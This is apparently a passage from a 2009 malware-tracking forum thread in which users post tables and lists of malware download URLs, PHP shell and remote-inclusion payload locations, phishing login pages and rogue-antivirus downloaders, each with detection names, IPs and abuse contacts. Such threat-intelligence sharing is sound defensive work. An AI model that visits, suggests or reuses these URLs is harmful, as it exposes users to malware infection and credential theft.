| 2009-07-21 13:24:56  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/lovemovie/sexhotcam.exe                                        |
| 2009-07-21 13:24:56  | avira   | TR/Drop.Stabs.aap         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/lovemovie/videosex.exe                                         |
| 2009-07-21 13:24:56  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/majeeeed/8099.exe                                              |
| 2009-07-21 13:24:55  | avira   | TR/Spy.Banker.Gen         | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/killerzim/Foto.jpg.exe                                         |
| 2009-07-21 13:24:55  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/killerzim/wuauclt.exe                                          |
| 2009-07-21 13:24:55  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/KINGZW/index.php                                               |
| 2009-07-21 13:24:55  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/kiprock/suck/login.php                                         |
| 2009-07-21 13:24:55  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/kiprock/suck/login.php?                                        |
| 2009-07-21 13:24:55  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/kl1ku/index.php                                                |
| 2009-07-21 13:24:55  | avira   | TR/Agent.uckr             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/kl3zero/imuhgetyou.exe                                         |
| 2009-07-21 13:24:55  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/krazyman/login.php                                             |
| 2009-07-21 13:24:55  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/LaTinBoy/gunbound                                              |
| 2009-07-21 13:24:54  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/khaled1234/TASKMAN_DT.exe                                      |
| 2009-07-21 13:24:53  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/keane/login.php                                                |
| 2009-07-21 13:24:52  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/justblaze05/sever.exe                                          |
| 2009-07-21 13:24:52  | avira   | DR/bvb.SAG                | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/kaled2000/server.exe                                           |
| 2009-07-21 13:24:50  | avira   | WORM/IrcBot.jvw           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/hinda/hotsexy.exe                                              |
| 2009-07-21 13:24:50  | avira   | TR/Crypt.ZPACK.Gen        | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/hkayne10/trance%20music.exe                                    |
| 2009-07-21 13:24:50  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/hzman/lolo.exe.lolo                                            |
| 2009-07-21 13:24:50  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/iinsert/index.php?link=http://&amp;size                        |
| 2009-07-21 13:24:50  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/isengbu/                                                       |
| 2009-07-21 13:24:49  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/FreeStuff/Rapidshare/Verify.html                               |
| 2009-07-21 13:24:49  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/friendters/tas/                                                |
| 2009-07-21 13:24:49  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/friendters/tas/?                                               |
| 2009-07-21 13:24:49  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/Gametimegenerator/                                             |
| 2009-07-21 13:24:49  | avira   | BDS/Bifrose.aqib          | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/glg/Network-Dmar.exe                                           |
| 2009-07-21 13:24:49  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/Grokers                                                        |
| 2009-07-21 13:24:49  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/Grokers/                                                       |
| 2009-07-21 13:24:49  | avira   | TR/Dropper.Gen            | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/Haamas/server.exe                                              |
| 2009-07-21 13:24:49  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/hackerbpp/Login/login-next.html                                |
| 2009-07-21 13:24:49  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/hackerbpp/Login/login-next.html?                               |
| 2009-07-21 13:24:49  | avira   | HTML/Infected.WebPage.Gen | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/halifaxinternetbanki/mybank(1)(1).alliance-leicester.co.uk.htm |
| 2009-07-21 13:24:49  | avira   | TR/Dldr.Tiny.CA           | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/haneene/server.com                                             |
| 2009-07-21 13:24:49  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/hayes/login.html                                               |
| 2009-07-21 13:24:48  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/DeviLTakumi/login.php                                          |
| 2009-07-21 13:24:48  | avira   | TR/Agent.uckr             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/dickybob2525/system.exe                                        |
| 2009-07-21 13:24:48  | avira   | DR/Delphi.Gen             | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/dickybob2525/web/120.exe                                       |
| 2009-07-21 13:24:48  | undef   | unknown_html              | 64.62.181.46 | abuse@he.net | US      | ARIN   | HURRICANE-4 | http://h1.ripway.com/doger/Login.html                                            &nb
Title: Re: daily something......
Post by: sparsha on July 23, 2009, 02:51:47 pm
sites related XP Deluxe Protector rogue
Code: [Select]

http://antispy2009.net/onlinescan/index.php -> fake scanner page
http://antispy2009.net/setup.exe -> Rogue downloader

http://downloadsoftwareserver3.com/gdi32lib.dll
http://downloadsoftwareserver3.com/xpdeluxe.exe

xp-deluxeprotector.com - homepage
Title: Re: daily something......
Post by: sparsha on July 23, 2009, 03:07:50 pm
Code: [Select]

http://scanriteweb.com/hitin.php?land=98&affid=16100
http://scanriteweb.com/download.php?affid=16100

http://securityscanavailable.com/hitin.php?land=20&affid=20100
http://securityscanavailable.com/download.php?affid=20100

http://exereload.com/onlinemovies.1.48040.exe

Title: Re: daily something......
Post by: cleanmx on July 23, 2009, 04:33:12 pm
21/22/23 Jul new malware
Code: [Select]
+----------------------+---------+--------------------------------+-----------------+--------------------------------+---------+--------+---------------------------+--------------------------------------------------------------------------------------------------+
| from_unixtime(first) | scanner | virusname                      | review          | email                          | country | source | netname                   | url                                                                                              |
+----------------------+---------+--------------------------------+-----------------+--------------------------------+---------+--------+---------------------------+--------------------------------------------------------------------------------------------------+
| 2009-07-23 18:01:43  | undef   | unknown_onlinemovies.45017.exe | 95.211.8.20     | abuse@leaseweb.com             | NL      | RIPE   | NL-LEASEWEB-20080724      | http://load-exe-world.com/onlinemovies.45017.exe                                                 |
| 2009-07-23 18:01:34  | undef   | unknown_ArchosInstaller.exe    | 83.167.45.32    | abuse@neotelecoms.com          | FR      | RIPE   | PLANETSERVICE-1-NEOT      | http://www.archos.com/plugins/_gen5/NDLX6X46TNL9UW/cinema_plugin_a605_install.exe                |
| 2009-07-23 18:01:34  | undef   | unknown_ArchosInstaller.exe    | 83.167.45.32    | abuse@neotelecoms.com          | FR      | RIPE   | PLANETSERVICE-1-NEOT      | http://www.archos.com/plugins/_gen5/NDLX6X46TNL9UW/iradio_plugin_a605_install.exe                |
| 2009-07-23 18:01:34  | undef   | unknown_ArchosInstaller.exe    | 83.167.45.32    | abuse@neotelecoms.com          | FR      | RIPE   | PLANETSERVICE-1-NEOT      | http://www.archos.com/plugins/_gen5/NDLX6X46TNL9UW/videopodcast_plugin_a605_install.exe          |
| 2009-07-23 18:01:33  | undef   | unknown_ArchosInstaller.exe    | 83.167.45.32    | abuse@neotelecoms.com          | FR      | RIPE   | PLANETSERVICE-1-NEOT      | http://www.archos.com/plugins/_gen5/NDLX6X46TNL9UW/webbrowser_plugin_a605_install.exe            |
| 2009-07-23 17:00:20  | avira   | PHP/BackDoor.E                 | 202.157.150.105 | indra@webvisions.com           | SG      | APNIC  | WEBVISIONS-SERVER         | http://www.fusionc.com/_private/id.jpg                                                           |
| 2009-07-23 16:43:45  | avira   | EXP/PHP.E                      | 64.235.57.20    | noc@premianet.com              | US      | ARIN   | APH-LAS-NV1               | http://www.virtualhost.com.mx/xeonbox/xpl/list                                                   |
| 2009-07-23 16:18:57  | avira   | TR/PHP.PHPInfo.D               | 211.202.2.220   | abuse@hanaro.com               | KR      | APNIC  | HANANET                   | http://dwno.or.kr/bbs/data/swat/v6.txt                                                           |
| 2009-07-23 16:18:30  | clamav  | PHP.Shell-11                   | 58.86.38.41     | maxchang@kbtelecom.net         | TW      | APNIC  | KBT-NET                   | http://18-kk.com/bot/pbot.txt                                                                    |
| 2009-07-23 16:13:56  | avira   | PHP/Pbot.A.6                   | 213.195.69.64   | abuse@ibercom.com              | ES      | RIPE   | IBERCOMNET                | http://www.etxeonenak.com/archivos/alisei.txt                                                    |
| 2009-07-23 16:03:18  | undef   | unknown_html_RFI_php           | 213.155.31.144  | kackad@list.ru                 | UA      | RIPE   | skylog                    | http://skylog.kz/5c464da2bb6908cbd39dacdd4f42bac9/id1.txt                                        |
| 2009-07-23 15:34:50  | clamav  | PHP.ShellExec                  | 98.137.46.72    | network-abuse@cc.yahoo-inc.com | US      | ARIN   | A-YAHOO-US9               | http://www.geocities.com/andika.arganata/ping/mildnet.txt                                        |
| 2009-07-23 15:34:06  | avira   | PHP/Pbot.A.6                   | 78.129.205.31   | abuse_rs@altervista.it         | IT      | RIPE   | AlterVista_1              | http://idididid.altervista.org/dark.txt                                                          |
| 2009-07-23 15:23:29  | undef   | unknown_html_RFI_php           | 211.202.2.220   | abuse@hanaro.com               | KR      | APNIC  | HANANET                   | http://dwno.or.kr/bbs/data/swat/tes.txt                                                          |
| 2009-07-23 15:14:41  | undef   | unknown_html_RFI_php           | 208.109.14.78   | abuse@godaddy.com              | US      | ARIN   | GO-DADDY-SOFTWARE-INC     | http://www.net-www.info/rotaryxativa/modules/z1                                                  |
| 2009-07-23 15:08:50  | undef   | unknown_html_RFI_php           | 211.47.128.229  | abuse@sknetworks.co.kr         | KR      | APNIC  | KRNIC-KR                  | http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt                    |
| 2009-07-23 15:02:04  | undef   | unknown_html_RFI_php           | 67.217.53.31    | hdnoc@hostdepartment.com       | US      | ARIN   | WORLD-ISP-NETWORK         | http://route1eventservices.com/coppermine/include/fx29id.txt                                     |
| 2009-07-23 14:54:30  | undef   | unknown_html_RFI_php           | 132.198.48.12   | abuse@uvm.edu                  | US      | ARIN   | UVM-NET                   | http://esf.uvm.edu/rmsp/skins/myskin/css/id1.txt                                                 |
| 2009-07-23 14:54:22  | avira   | PHP/Info.A                     | 132.198.48.12   | abuse@uvm.edu                  | US      | ARIN   | UVM-NET                   | http://esf.uvm.edu/rmsp/skins/myskin/css/idd.txt                                                 |
| 2009-07-23 14:22:51  | clamav  | PHP.Downloader-4               | 110.45.138.139  | support@kidc.net               | KR      | APNIC  | KIDC                      | http://www.shinsungbuk.com/BOARD/skin/ggambo7002_gallery/vti/spread.txt                          |
| 2009-07-23 14:18:17  | avira   | PHP/BackDoor.AR                | 58.230.118.105  | abuse@hanaro.com               | KR      | APNIC  | HANANET                   | http://shalomchair.com/fx29id2.txt                                                               |
| 2009-07-23 14:07:08  | avira   | PHP/C99Shell.C                 | 65.247.182.200  | abuse-mail@verizonbusiness.com | US      | ARIN   | UUNET65-2                 | http://65.247.182.200/r                                                                          |
| 2009-07-23 14:05:28  | avira   | SPR/PHP.ID                     | 59.4.104.174    | abuse@kornet.net               | KR      | APNIC  | KORNET                    | http://80.mipyeong.or.kr/fr.txt                                                                  |
| 2009-07-23 14:04:38  | avira   | SPR/PHP.ID                     | 77.220.22